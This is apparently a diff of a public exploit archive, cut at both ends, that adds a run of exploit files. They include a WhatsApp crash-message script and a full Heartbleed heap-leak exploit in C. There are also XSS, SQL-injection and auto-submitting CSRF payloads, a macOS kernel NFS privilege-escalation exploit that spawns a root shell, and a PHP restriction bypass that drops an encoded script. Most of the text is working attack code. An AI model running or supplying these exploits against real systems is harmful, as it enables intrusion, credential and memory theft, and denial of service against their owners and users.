# of their clients. Use --v1 switch to try it anyway. Typically this field should contain the phone's IMEI if your account is setup on
# a Nokia or an Android device, or the phone's WLAN's MAC Address for iOS devices. If you are not trying to use existing credentials
# or want to register, you can leave this field blank or set it to some random text.
# password: Password to use for login. You obtain this password when you register using Yowsup.
######################################################
MINE_CONFIG ="config.cfg"
def getCredentials(config = DEFAULT_CONFIG):
if os.path.isfile(config):
f = open(config)
phone = ""
idx = ""
pw = ""
cc = ""
try:
for l in f:
line = l.strip()
if len(line) and line[0] not in ('#',';'):
prep = line.split('#', 1)[0].split(';', 1)[0].split('=', 1)
varname = prep[0].strip()
val = prep[1].strip()
if varname == "phone":
phone = val
elif varname == "id":
idx = val
elif varname =="password":
pw =val
elif varname == "cc":
cc = val
return (cc, phone, idx, pw);
except:
pass
return 0
def main(phone):
credentials = getCredentials(MINE_CONFIG or DEFAULT_CONFIG )
if credentials:
countryCode, login, identity, password = credentials
identity = Utilities.processIdentity(identity)
password = base64.b64decode(password)
# Custom message that will crash WhatsApp
message = message = "\xf4\xaa\xde\x04\xbf"
#print countryCode, login, identity, password
wa = WhatsappEchoClient(phone, message)
wa.login(login, password)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("number", help="Phone number to send the crash message")
parser.add_argument("-v", "--verbose", help="increase output verbosity", action="store_true")
args = parser.parse_args()
Debugger.enabled = args.verbose
main(args.number)

21
platforms/multiple/local/32847.txt Executable file
View file

@ -0,0 +1,21 @@
source: http://www.securityfocus.com/bid/34069/info
PostgreSQL is prone to an information-disclosure vulnerability.
Local attackers can exploit this issue to obtain sensitive information that may lead to further attacks.
PostgreSQL 8.3.6 is vulnerable; other versions may also be affected.
CREATE OR REPLACE FUNCTION do_tell(anyelement)
RETURNS bool
COST 0.1
VOLATILE
LANGUAGE plpgsql
AS $body$
BEGIN
raise notice 'hah: %s', $1::text;
return true;
END;
$body$;
SELECT * FROM restricted_view WHERE do_tell(secret_column);

299
platforms/multiple/remote/32791.c
View file

@ -3,43 +3,69 @@
* =========================================================
* This exploit uses OpenSSL to create an encrypted connection
* and trigger the heartbleed leak. The leaked information is
* returned encrypted and is then decrypted, decompressed and
* wrote to a file to annoy IDS/forensics. The exploit can set
* the heatbeart payload length arbitrarily or use two preset
* values for 0x00 and MAX length. The vulnerability occurs due
* returned within encrypted SSL packets and is then decrypted
* and wrote to a file to annoy IDS/forensics. The exploit can
* set heartbeat payload length arbitrarily or use two preset
* values for NULL and MAX length. The vulnerability occurs due
* to bounds checking not being performed on a heap value which
* is user supplied and returned to the user as part of DTLS/TLS
* heartbeat SSL extension. All versions of OpenSSL 1.0.1 to
* 1.0.1f are known affected. You must run this against a target
* which is linked to a vulnerable OpenSSL library using DTLS/TLS.
* This exploit leaks upto 65532 bytes of remote heap each request
* and can be run in a loop until the connected peer ends connection.
* The data leaked contains 16 bytes of random padding at the end.
* The exploit can be used against a connecting client or server,
* it can also send pre_cmd's to plain-text services to establish
* an SSL session such as with STARTTLS on SMTP/IMAP/POP3. Clients
* will often forcefully close the connection during large leak
* requests so try to lower your payload request size.
*
* Compiled on ArchLinux x86_64 gcc 4.8.2 20140206 w/OpenSSL 1.0.1g
*
* E.g.
* $ gcc -lssl -lssl3 -lcrypto heartbleed.c -o heartbleed
* $ ./heartbleed -s 192.168.11.9 -p 443 -f leakme -t 65535
* $ ./heartbleed -s 192.168.11.23 -p 443 -f out -t 1
* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit
* [ =============================================================
* [ connecting to 192.168.11.9 443/tcp
* [ connected to 192.168.11.9 443/tcp
* [ setting heartbeat payload_length to 65535
* [ heartbeat returned type=24 length=16416
* [ decrypting and decompressing SSL packet
* [ connecting to 192.168.11.23 443/tcp
* [ connected to 192.168.11.23 443/tcp
* [ <3 <3 <3 heart bleed <3 <3 <3
* [ heartbeat returned type=24 length=16408
* [ decrypting SSL packet
* [ heartbleed leaked length=65535
* [ final record type=24, length=16384
* [ wrote 16384 bytes to file 'leakme'
* [ wrote 16381 bytes of heap to file 'out'
* [ heartbeat returned type=24 length=16408
* [ decrypting SSL packet
* [ final record type=24, length=16384
* [ wrote 16384 bytes of heap to file 'out'
* [ heartbeat returned type=24 length=16408
* [ decrypting SSL packet
* [ final record type=24, length=16384
* [ wrote 16384 bytes of heap to file 'out'
* [ heartbeat returned type=24 length=16408
* [ decrypting SSL packet
* [ final record type=24, length=16384
* [ wrote 16384 bytes of heap to file 'out'
* [ heartbeat returned type=24 length=42
* [ decrypting SSL packet
* [ final record type=24, length=18
* [ wrote 18 bytes of heap to file 'out'
* [ done.
* $ hexdump -C leakme
* $ ls -al out
* -rwx------ 1 fantastic fantastic 65554 Apr 11 13:53 out
* $ hexdump -C out
* - snip - snip
*
* Added support for pre_cmd's and as an example use STARTTLS
* to leak from vulnerable SMTP services.
*
* Added experimental support for exploiting connecting clients
* with rogue server. Generate certificates with the following:
* Use following example command to generate certificates for clients.
*
* $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
* -keyout server.key -out server.crt
*
* Debian compile with "gcc heartbleed.c -o heartbleed -Wl,-Bstatic \
* -lssl -Wl,-Bdynamic -lssl3 -lcrypto"
*
* todo: add udp/dtls support.
*
* - Hacker Fantastic
@ -72,6 +98,11 @@
#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \
c[1]=(unsigned char)(((s) )&0xff)),c+=2)
int first = 0;
int leakbytes = 0;
int repeat = 1;
int badpackets = 0;
typedef struct {
int socket;
SSL *sslHandle;
@ -89,13 +120,11 @@ typedef struct {
void ssl_init();
void usage();
void* heartbleed(connection*,unsigned int);
void* sneakyleaky(connection*,char*,int);
int tcp_connect(char*,int);
int tcp_bind(char*, int);
connection* tls_connect(int);
connection* tls_bind(int);
int pre_cmd(int,int);
int pre_cmd(int,int,int);
void* heartbleed(connection* ,unsigned int);
void* sneakyleaky(connection* ,char*, int);
@ -161,10 +190,15 @@ void ssl_init(){
connection* tls_connect(int sd){
connection *c;
c = malloc(sizeof(connection));
c->socket = sd;
if(c==NULL){
printf("[ error in malloc()\n");
exit(0);
}
c->socket = sd;
c->sslHandle = NULL;
c->sslContext = NULL;
c->sslContext = SSL_CTX_new(TLSv1_client_method());
c->sslContext = SSL_CTX_new(SSLv23_client_method());
SSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);
if(c->sslContext==NULL)
ERR_print_errors_fp(stderr);
c->sslHandle = SSL_new(c->sslContext);
@ -186,12 +220,20 @@ connection* tls_bind(int sd){
connection *c;
char* buf;
buf = malloc(4096);
if(buf==NULL){
printf("[ error in malloc()\n");
exit(0);
}
memset(buf,0,4096);
c = malloc(sizeof(connection));
c->socket = sd;
if(c==NULL){
printf("[ error in malloc()\n");
exit(0);
}
c->socket = sd;
c->sslHandle = NULL;
c->sslContext = NULL;
c->sslContext = SSL_CTX_new(TLSv1_server_method());
c->sslContext = SSL_CTX_new(SSLv23_server_method());
if(c->sslContext==NULL)
ERR_print_errors_fp(stderr);
SSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3);
@ -218,28 +260,51 @@ connection* tls_bind(int sd){
return c;
}
int pre_cmd(int sd,int verbose){
int pre_cmd(int sd,int precmd,int verbose){
/* this function can be used to send commands to a plain-text
service or client before heartbleed exploit attempt. e.g. STARTTLS */
int rc;
int rc, go = 0;
char* buffer;
char* hello = "EHLO test\n";
char* start = "STARTTLS\n";
buffer = malloc(2049);
memset(buffer,0,2049);
rc = read(sd,buffer,2048);
printf("[ banner: %s",buffer);
send(sd,hello,strlen(hello),0);
memset(buffer,0,2049);
rc = read(sd,buffer,2048);
if(verbose==1){
printf("%s\n",buffer);
}
send(sd,start,strlen(start),0);
memset(buffer,0,2049);
rc = read(sd,buffer,2048);
if(verbose==1){
printf("%s\n",buffer);
char* line1;
char* line2;
switch(precmd){
case 0:
line1 = "EHLO test\n";
line2 = "STARTTLS\n";
break;
case 1:
line1 = "CAPA\n";
line2 = "STLS\n";
break;
case 2:
line1 = "a001 CAPB\n";
line2 = "a002 STARTTLS\n";
break;
default:
go = 1;
break;
}
if(go==0){
buffer = malloc(2049);
if(buffer==NULL){
printf("[ error in malloc()\n");
exit(0);
}
memset(buffer,0,2049);
rc = read(sd,buffer,2048);
printf("[ banner: %s",buffer);
send(sd,line1,strlen(line1),0);
memset(buffer,0,2049);
rc = read(sd,buffer,2048);
if(verbose==1){
printf("%s\n",buffer);
}
send(sd,line2,strlen(line2),0);
memset(buffer,0,2049);
rc = read(sd,buffer,2048);
if(verbose==1){
printf("%s\n",buffer);
}
}
return sd;
}
@ -248,7 +313,11 @@ void* heartbleed(connection *c,unsigned int type){
unsigned char *buf, *p;
int ret;
buf = OPENSSL_malloc(1 + 2);
p = buf;
if(buf==NULL){
printf("[ error in malloc()\n");
exit(0);
}
p = buf;
*p++ = TLS1_HB_REQUEST;
switch(type){
case 0:
@ -262,7 +331,7 @@ void* heartbleed(connection *c,unsigned int type){
s2n(type,p);
break;
}
printf("[ <3 <3 <3 heart bleed <3 <3 <3 <3\n");
printf("[ <3 <3 <3 heart bleed <3 <3 <3\n");
ret = ssl3_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3);
OPENSSL_free(buf);
return c;
@ -300,10 +369,19 @@ void* sneakyleaky(connection *c,char* filename, int verbose){
n2s(p,rr->length);
if(rr->type==24){
printf("[ heartbeat returned type=%d length=%u\n",rr->type, rr->length);
if(rr->length > 16834){
printf("[ error: got a malformed TLS length.\n");
exit(0);
}
}
else{
printf("[ incorrect record type=%d length=%u returned\n",rr->type,rr->length);
s->packet_length=0;
badpackets++;
if(badpackets > 3){
printf("[ error: too many bad packets recieved\n");
exit(0);
}
goto apple;
}
}
@ -312,7 +390,7 @@ void* sneakyleaky(connection *c,char* filename, int verbose){
n=ssl3_read_n(s,i,i,1);
if (n <= 0) goto apple;
}
printf("[ decrypting and decompressing SSL packet\n");
printf("[ decrypting SSL packet\n");
s->rstate=SSL_ST_READ_HEADER;
rr->input= &(s->packet[SSL3_RT_HEADER_LENGTH]);
rr->data=rr->input;
@ -371,19 +449,56 @@ void* sneakyleaky(connection *c,char* filename, int verbose){
}
rr->off=0;
s->packet_length=0;
if(verbose==1){
{ unsigned int z; for (z=0; z<rr->length; z++) printf("%02X%c",rr->data[z],((z+1)%16)?' ':'\n'); }
if(first==0){
uint heartbleed_len = 0;
char* fp = s->s3->rrec.data;
(long)fp++;
memcpy(&heartbleed_len,fp,2);
heartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;
first = 2;
leakbytes = heartbleed_len + 16;
printf("[ heartbleed leaked length=%u\n",heartbleed_len);
}
if(verbose==1){
{ unsigned int z; for (z=0; z<rr->length; z++) printf("%02X%c",rr->data[z],((z+1)%16)?' ':'\n'); }
printf("\n");
}
leakbytes-=rr->length;
if(leakbytes > 0){
repeat = 1;
}
else{
repeat = 0;
}
printf("[ final record type=%d, length=%u\n", rr->type, rr->length);
int fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);
write(fd,s->s3->rrec.data,s->s3->rrec.length);
close(fd);
printf("[ wrote %d bytes to file '%s'\n",rr->length, filename);
printf("[ done.\n");
exit(0);
int output = s->s3->rrec.length-3;
if(output > 0){
int fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);
if(first==2){
first--;
write(fd,s->s3->rrec.data+3,s->s3->rrec.length);
/* first three bytes are resp+len */
printf("[ wrote %d bytes of heap to file '%s'\n",s->s3->rrec.length-3,filename);
}
else{
/* heap data & 16 bytes padding */
write(fd,s->s3->rrec.data+3,s->s3->rrec.length);
printf("[ wrote %d bytes of heap to file '%s'\n",s->s3->rrec.length,filename);
}
close(fd);
}
else{
printf("[ nothing from the heap to write\n");
}
return;
apple:
printf("[ problem handling SSL record packet - wrong type?\n");
badpackets++;
if(badpackets > 3){
printf("[ error: too many bad packets recieved\n");
exit(0);
}
return;
}
void usage(){
@ -392,8 +507,12 @@ void usage(){
printf("[ --port|-p <port> - the port to target\n");
printf("[ --file|-f <filename> - file to write data to\n");
printf("[ --bind|-b <ip> - bind to ip for exploiting clients\n");
printf("[ --precmd|-c - send precmd buffer (STARTTLS)\n");
printf("[ --type|-t - select exploit to try\n");
printf("[ --precmd|-c <n> - send precmd buffer (STARTTLS)\n");
printf("[ 0 = SMTP\n");
printf("[ 1 = POP3\n");
printf("[ 2 = IMAP\n");
printf("[ --loop|-l - loop the exploit attempts\n");
printf("[ --type|-t <n> - select exploit to try\n");
printf("[ 0 = null length\n");
printf("[ 1 = max leak\n");
printf("[ n = heartbeat payload_length\n");
@ -406,11 +525,12 @@ void usage(){
int main(int argc, char* argv[]){
int ret, port, userc, index;
int type = 1, udp = 0, verbose = 0, bind = 0, precmd = 0;
int type = 1, udp = 0, verbose = 0, bind = 0, precmd = 9;
int loop = 0;
struct hostent *h;
connection* c;
char *host, *file;
int ihost = 0, iport = 0, ifile = 0, itype = 0;
int ihost = 0, iport = 0, ifile = 0, itype = 0, iprecmd = 0;
printf("[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\n");
printf("[ =============================================================\n");
static struct option options[] = {
@ -420,11 +540,12 @@ int main(int argc, char* argv[]){
{"type", 1, 0, 't'},
{"bind", 1, 0, 'b'},
{"verbose", 0, 0, 'v'},
{"precmd", 0, 0, 'c'},
{"precmd", 1, 0, 'c'},
{"loop", 0, 0, 'l'},
{"help", 0, 0,'h'}
};
while(userc != -1) {
userc = getopt_long(argc,argv,"s:p:f:t:b:cvh",options,&index);
userc = getopt_long(argc,argv,"s:p:f:t:b:c:lvh",options,&index);
switch(userc) {
case -1:
break;
@ -437,6 +558,10 @@ int main(int argc, char* argv[]){
exit(1);
}
host = malloc(strlen(optarg) + 1);
if(host==NULL){
printf("[ error in malloc()\n");
exit(0);
}
sprintf(host,"%s",optarg);
}
break;
@ -449,6 +574,10 @@ int main(int argc, char* argv[]){
case 'f':
if(ifile==0){
file = malloc(strlen(optarg) + 1);
if(file==NULL){
printf("[ error in malloc()\n");
exit(0);
}
sprintf(file,"%s",optarg);
ifile = 1;
}
@ -466,16 +595,26 @@ int main(int argc, char* argv[]){
if(ihost==0){
ihost = 1;
host = malloc(strlen(optarg)+1);
if(host==NULL){
printf("[ error in malloc()\n");
exit(0);
}
sprintf(host,"%s",optarg);
bind = 1;
}
break;
case 'c':
precmd = 1;
if(iprecmd == 0){
iprecmd = 1;
precmd = atoi(optarg);
}
break;
case 'v':
verbose = 1;
break;
case 'l':
loop = 1;
break;
default:
break;
}
@ -487,12 +626,22 @@ int main(int argc, char* argv[]){
ssl_init();
if(bind==0){
ret = tcp_connect(host, port);
if(precmd==1){
pre_cmd(ret, verbose);
}
pre_cmd(ret, precmd, verbose);
c = tls_connect(ret);
heartbleed(c,type);
sneakyleaky(c,file,verbose);
while(repeat==1){
sneakyleaky(c,file,verbose);
}
while(loop==1){
printf("[ entered heartbleed loop\n");
first=0;
repeat=1;
heartbleed(c,type);
while(repeat==1){
sneakyleaky(c,file,verbose);
}
}
printf("[ done.\n");
exit(0);
}
else{
@ -509,13 +658,23 @@ int main(int argc, char* argv[]){
}
else{
c = tls_bind(sd);
if(precmd==1){
pre_cmd(ret, verbose);
}
pre_cmd(ret, precmd, verbose);
heartbleed(c,type);
sneakyleaky(c,file,verbose);
while(repeat==1){
sneakyleaky(c,file,verbose);
}
while(loop==1){
printf("[ entered heartbleed loop\n");
first=0;
repeat=0;
heartbleed(c,type);
while(repeat==1){
sneakyleaky(c,file,verbose);
}
}
printf("[ done.\n");
exit(0);
}
}
}
}
}

10
platforms/multiple/remote/32839.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/34001/info
IBM WebSphere Application Server (WAS) is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
This issue affects versions prior to WAS 6.1.0.23 and 7.0.0.3.
http://www.example.com/ibm/console/<script>alert('DSecRG_XSS')</script>
http://www.example.com/ibm/console/<script>alert('DSecRG_XSS')</script>.jsp

11
platforms/multiple/remote/32877.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/34288/info
Xlight FTP Server is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Versions prior to Xlight FTP Server 3.2.1 are affected.
The following example input is available:
User: ' OR '1'='1' ;#

15
platforms/multiple/webapps/32894.txt Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/34447/info
IBM BladeCenter Advanced Management Module is prone to the following remote vulnerabilities:
- An HTML-injection vulnerability
- A cross-site scripting vulnerability
- An information-disclosure vulnerability
- Multiple cross-site request-forgery vulnerabilities
An attacker can exploit these issues to obtain sensitive information, execute arbitrary script code, steal cookie-based authentication credentials, and perform actions as an authenticated user of the application. Other attacks are also possible.
Versions prior to BladeCenter Advanced Management Module 1.42U are vulnerable.
For the HTML-injection issue:
username: </script><script src="//www.example.com"></script><script>

14
platforms/multiple/webapps/32895.txt Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/34447/info
IBM BladeCenter Advanced Management Module is prone to the following remote vulnerabilities:
- An HTML-injection vulnerability
- A cross-site scripting vulnerability
- An information-disclosure vulnerability
- Multiple cross-site request-forgery vulnerabilities
An attacker can exploit these issues to obtain sensitive information, execute arbitrary script code, steal cookie-based authentication credentials, and perform actions as an authenticated user of the application. Other attacks are also possible.
Versions prior to BladeCenter Advanced Management Module 1.42U are vulnerable.
http://example.com/private/file_management.ssi?PATH=/etc"><script%20src="http://www.example.com"></script>

14
platforms/multiple/webapps/32896.html Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/34447/info
IBM BladeCenter Advanced Management Module is prone to the following remote vulnerabilities:
- An HTML-injection vulnerability
- A cross-site scripting vulnerability
- An information-disclosure vulnerability
- Multiple cross-site request-forgery vulnerabilities
An attacker can exploit these issues to obtain sensitive information, execute arbitrary script code, steal cookie-based authentication credentials, and perform actions as an authenticated user of the application. Other attacks are also possible.
Versions prior to BladeCenter Advanced Management Module 1.42U are vulnerable.
<html> <body onload="document.foobar.submit()"> <form name="foobar" method="post" action="http://example.com/private/blade_power_action" style="display:none"> <input name="COMMAND" value="6.3.2"> <input name="STATE" value="0"> <input name="CHECKED" value="15"> <input name="selall" value="on"> <input name="sel" value="bl1"> <input name="sel" value="bl2"> <input name="sel" value="bl3"> <input name="sel" value="bl4"> <input name="JUNK" value="1"> </form> <body> </html>

9
platforms/multiple/webapps/32908.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34513/info
IBM Tivoli Continuous Data Protection for Files is prone to a cross-site scripting vulnerability.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials.
IBM Tivoli Continuous Data Protection for Files 3.1.4.0 is vulnerable; other versions may also be affected.
http://www.example.com/login/FilepathLogin.html?reason=<script>alert(0)</script>

31
platforms/novell/remote/32876.txt Executable file
View file

@ -0,0 +1,31 @@
source: http://www.securityfocus.com/bid/34267/info
Novell NetStorage is prone to the following remote vulnerabilities:
- An information-disclosure vulnerability
- A cross-site scripting vulnerability
- A denial-of-service vulnerability
Attackers can exploit these issues to obtain sensitive information, execute arbitrary script code, steal cookie-based authentication credentials, and cause a denial-of-service condition. Other attacks are also possible.
The following are vulnerable:
NetStorage 3.1.5-19 on Open Enterprise Server (OES)
NetStorage 2.0.1 on NetWare 6.5 SP6
The following examples are available:
Cross-site scripting:
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
Denial of service:
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--><
/SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
Information disclosure:
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--><
/SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

16
platforms/osx/dos/32817.txt Executable file
View file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/33909/info
Apple Safari is prone to a denial-of-service vulnerability that stems from a NULL-pointer dereference.
Attackers can exploit this issue to crash the affected application, denying service to legitimate users.
Apple Safari 4 Beta is vulnerable; other versions may also be affected.
The following example URIs are available:
feeds:%&www.example.com/feed/
feeds:{&www.example.com/feed/
feeds:}&www.example.com/feed/
feeds:^&www.example.com/feed/
feeds:`&www.example.com/feed/
feeds:|&www.example.com/feed/

163
platforms/osx/local/32813.c Executable file
View file

@ -0,0 +1,163 @@
/*
* Apple Mac OS X Lion Kernel <= xnu-1699.32.7 except xnu-1699.24.8 NFS Mount Privilege Escalation Exploit
* CVE None
* by Kenzley Alphonse <kenzley [dot] alphonse [at] gmail [dot] com>
*
*
* Notes:
* This exploit leverage a stack overflow vulnerability to escalate privileges.
* The vulnerable function nfs_convert_old_nfs_args does not verify the size
* of a user-provided argument before copying it to the stack. As a result by
* passing a large size, a local user can overwrite the stack with arbitrary
* content.
*
* Tested on Max OS X Lion xnu-1699.22.73 (x86_64)
* Tested on Max OS X Lion xnu-1699.32.7 (x86_64)
*
* Greets to taviso, spender, joberheide
*/
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <errno.h>
#include <sys/mman.h>
#include <sys/mount.h>
#include <sys/param.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
/** change these to fit your environment if needed **/
#define SSIZE (536)
/** struct user_nfs_args was copied directly from "/bsd/nfs/nfs.h" of the xnu kernel **/
struct user_nfs_args {
int version; /* args structure version number */
char* addr __attribute__((aligned(8))); /* file server address */
int addrlen; /* length of address */
int sotype; /* Socket type */
int proto; /* and Protocol */
char * fh __attribute__((aligned(8))); /* File handle to be mounted */
int fhsize; /* Size, in bytes, of fh */
int flags; /* flags */
int wsize; /* write size in bytes */
int rsize; /* read size in bytes */
int readdirsize; /* readdir size in bytes */
int timeo; /* initial timeout in .1 secs */
int retrans; /* times to retry send */
int maxgrouplist; /* Max. size of group list */
int readahead; /* # of blocks to readahead */
int leaseterm; /* obsolete: Term (sec) of lease */
int deadthresh; /* obsolete: Retrans threshold */
char* hostname __attribute__((aligned(8))); /* server's name */
/* NFS_ARGSVERSION 3 ends here */
int acregmin; /* reg file min attr cache timeout */
int acregmax; /* reg file max attr cache timeout */
int acdirmin; /* dir min attr cache timeout */
int acdirmax; /* dir max attr cache timeout */
/* NFS_ARGSVERSION 4 ends here */
uint auth; /* security mechanism flavor */
/* NFS_ARGSVERSION 5 ends here */
uint deadtimeout; /* secs until unresponsive mount considered dead */
};
/** sets the uid for the current process and safely exits from the kernel**/
static void r00t_me() {
asm(
// padding
"nop; nop; nop; nop;"
// task_t %rax = current_task()
"movq %%gs:0x00000008, %%rax;"
"movq 0x00000348(%%rax), %%rax;"
// proc %rax = get_bsdtask_info()
"movq 0x000002d8(%%rax),%%rax;"
// ucred location at proc
"movq 0x000000d0(%%rax),%%rax;"
// uid = 0
"xorl %%edi, %%edi;"
"movl %%edi, 0x0000001c(%%rax);"
"movl %%edi, 0x00000020(%%rax);"
// fix the stack pointer and return (EACCES)
"movq $13, %%rax;"
"addq $0x00000308,%%rsp;"
"popq %%rbx;"
"popq %%r12;"
"popq %%r13;"
"popq %%r14;"
"popq %%r15;"
"popq %%rbp;"
"ret;"
:::"%rax"
);
}
int main(int argc, char ** argv) {
struct user_nfs_args xdrbuf;
char * path;
char obuf[SSIZE];
/** clear the arguments **/
memset(&xdrbuf, 0x00, sizeof(struct user_nfs_args));
memset(obuf, 0x00, SSIZE);
/** set up variable to get path to vulnerable code **/
xdrbuf.version = 3;
xdrbuf.hostname = "localhost";
xdrbuf.addrlen = SSIZE;
xdrbuf.addr = obuf;
/** set ret address **/
*(unsigned long *)&obuf[528] = (unsigned long) (&r00t_me + 5);
printf("[*] set ret = 0x%.16lx\n", *(unsigned long *)&obuf[528]);
/** create a unique tmp name **/
if ((path = tmpnam(NULL)) == NULL) {
// path can be any directory which we have read/write/exec access
// but I'd much rather create one instead of searching for one
perror("[-] tmpnam");
exit(EXIT_FAILURE);
}
/** make the path in tmp so that we can use it **/
if (mkdir(path, 0660) < 0) {
perror("[-] mkdir");
exit(EXIT_FAILURE);
}
/** inform the user that the path was created **/
printf("[*] created sploit path%s\n", path);
/** call the vulnerable function **/
if (mount("nfs", path, 0, &xdrbuf) < 0) {
if (errno == EACCES) {
puts("[+] escalating privileges...");
} else {
perror("[-] mount");
}
}
/** clean up tmp dir **/
if (rmdir(path) < 0) {
perror("[-] rmdir");
}
/** check if privs are equal to root **/
if (getuid() != 0) {
puts("[-] priviledge escalation failed");
exit(EXIT_FAILURE);
}
/** get root shell **/
printf("[+] We are now uid=%i ... your welcome!\n", getuid());
printf("[+] Dropping a shell.\n");
execl("/bin/sh", "/bin/sh", NULL);
return 0;
}

66
platforms/php/local/32901.php Executable file
View file

@ -0,0 +1,66 @@
source: http://www.securityfocus.com/bid/34475/info
PHP is prone to a 'safe_mode' and 'open_basedir' restriction-bypass vulnerability. Successful exploits could allow an attacker to access files in unauthorized locations.
This vulnerability would be an issue in shared-hosting configurations where multiple users can create and execute arbitrary PHP script code, with the 'safe_mode' and 'open_basedir' restrictions assumed to isolate the users from each other.
PHP 5.2.9 is vulnerable; other versions may also be affected.
<?php
/* SecurityReason.com - Security Audit Stuff
PHP 5.2.9 curl safe_mode & open_basedir bypass
http://securityreason.com/achievement_securityalert/61
exploit from "SecurityReason - Security Audit" lab.
for legal use only
http://securityreason.com/achievement_exploitalert/11
author: Maksymilian Arciemowicz
cxib [a&t] securityreason [0.0] com
R.I.P. ladyBMS
*/
$freiheit=fopen('./cx529.php', 'w');
fwrite($freiheit, base64_decode("
PD9waHANCi8qDQpzYWZlX21vZGUgYW5kIG9wZW5fYmFzZWRpciBCeXBhc3MgUEhQIDUuMi45
DQpieSBNYWtzeW1pbGlhbiBBcmNpZW1vd2ljeiBodHRwOi8vc2VjdXJpdHlyZWFzb24uY29t
Lw0KY3hpYiBbIGEuVF0gc2VjdXJpdHlyZWFzb24gWyBkMHRdIGNvbQ0KDQpOT1RFOg0KaHR0
cDovL3NlY3VyaXR5cmVhc29uLmNvbS9hY2hpZXZlbWVudF9zZWN1cml0eWFsZXJ0LzYxDQoN
CkVYUExPSVQ6DQpodHRwOi8vc2VjdXJpdHlyZWFzb24uY29tL2FjaGlldmVtZW50X2V4cGxv
aXRhbGVydC8xMA0KKi8NCg0KaWYoIWVtcHR5KCRfR0VUWydmaWxlJ10pKSAkZmlsZT0kX0dF
VFsnZmlsZSddOw0KZWxzZSBpZighZW1wdHkoJF9QT1NUWydmaWxlJ10pKSAkZmlsZT0kX1BP
U1RbJ2ZpbGUnXTsNCg0KZWNobyAnPFBSRT48UD5UaGlzIGlzIGV4cGxvaXQgZnJvbSA8YQ0K
aHJlZj0iaHR0cDovL3NlY3VyaXR5cmVhc29uLmNvbS8iIHRpdGxlPSJTZWN1cml0eUF1ZGl0
Ij5TZWN1cml0eSBBdWRpdCAtIFNlY3VyaXR5UmVhc29uPC9hPiBsYWJzLg0KQXV0aG9yIDog
TWFrc3ltaWxpYW4gQXJjaWVtb3dpY3oNCjxwPlNjcmlwdCBmb3IgbGVnYWwgdXNlIG9ubHku
DQo8cD5QSFAgNS4yLjkgc2FmZV9tb2RlICYgb3Blbl9iYXNlZGlyIGJ5cGFzcw0KPHA+TW9y
ZTogPGEgaHJlZj0iaHR0cDovL3NlY3VyaXR5cmVhc29uLmNvbS8iPlNlY3VyaXR5UmVhc29u
PC9hPg0KPHA+PGZvcm0gbmFtZT0iZm9ybSIgYWN0aW9uPSJodHRwOi8vJy4kX1NFUlZFUlsi
SFRUUF9IT1NUIl0uaHRtbHNwZWNpYWxjaGFycygkX1NFUlZFUlsiU0NSSVBUX04NCkFNRSJd
KS4kX1NFUlZFUlsiUEhQX1NFTEYiXS4nIiBtZXRob2Q9InBvc3QiPjxpbnB1dCB0eXBlPSJ0
ZXh0IiBuYW1lPSJmaWxlIiBzaXplPSI1MCIgdmFsdWU9IicuaHRtbHNwZWNpYWxjaGFycygk
ZmlsZSkuJyI+PGlucHV0IHR5cGU9InN1Ym1pdCIgbmFtZT0iaGFyZHN0eWxleiIgdmFsdWU9
IlNob3ciPjwvZm9ybT4nOw0KDQoNCiRsZXZlbD0wOw0KDQppZighZmlsZV9leGlzdHMoImZp
bGU6IikpDQoJbWtkaXIoImZpbGU6Iik7DQpjaGRpcigiZmlsZToiKTsNCiRsZXZlbCsrOw0K
DQokaGFyZHN0eWxlID0gZXhwbG9kZSgiLyIsICRmaWxlKTsNCg0KZm9yKCRhPTA7JGE8Y291
bnQoJGhhcmRzdHlsZSk7JGErKyl7DQoJaWYoIWVtcHR5KCRoYXJkc3R5bGVbJGFdKSl7DQoJ
CWlmKCFmaWxlX2V4aXN0cygkaGFyZHN0eWxlWyRhXSkpIA0KCQkJbWtkaXIoJGhhcmRzdHls
